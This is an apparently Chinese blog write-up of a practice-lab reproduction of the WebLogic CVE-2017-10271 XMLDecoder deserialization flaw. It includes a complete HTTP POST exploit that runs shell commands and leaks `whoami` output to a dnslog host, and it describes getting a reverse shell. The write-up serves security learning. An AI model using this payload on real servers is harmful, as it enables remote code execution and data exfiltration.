[CVE-2017-10271]Weblogic--WLS Security反序列化漏洞复现

靶机地址

网站地址 cyberstrikelab.com
靶机地址CVE-2017-10271

靶机说明

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

在这里插入图片描述

开启并访问靶机

在这里插入图片描述

在这里插入图片描述

POC

在访问地址后面补充 /wls-wsat/CoordinatorPortType 会跳转到如下页面,说明有漏洞
在这里插入图片描述

exp

两个核心:

  • 默认的GET方法修改为POST方法
  • Content-Type: text/xml

另外,靶机没有 curl 不过有 wget ,可通过 wget + dnslog 信息外带

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: xxxxxx.cyberstrikelab.com:83
Content-Type: text/xml
Content-Length: 617

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget `whoami`.xxxxx.dnslog.cn
</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

反弹shell

一开始反弹shell没有成功,网上查询资料,根据又菜又爱倒腾大佬文章提示,发现部分字符需要转换成实体编码;网上随便找的实体编码在线转换网站 HtmlEncode,反弹过程中使用了 cpolar 的内网穿透工具(免费的),顺利反弹到本地的kali电脑,顺利 getshell

利用在线网站将反弹 shell 的部分字符进行实体编码

在这里插入图片描述

后续查找flag过程略







参考资料以及工具网站:

  1. cyberstrikelab靶机网站 https://www.cyberstrikelab.com/
  2. 又菜又爱倒腾大佬的《Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)》
  3. 反弹shell网站 https://www.revshells.com/
  4. 实体编码在线转换网站 https://www.convertstring.com/zh_CN/EncodeDecode/HtmlEncode
  5. 内网穿透工具 https://www.cpolar.com/
  6. 大表哥哟的 cpolar 使用教程 https://mp.weixin.qq.com/s/-yD7ymzdlegwcLugnL9FZw
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值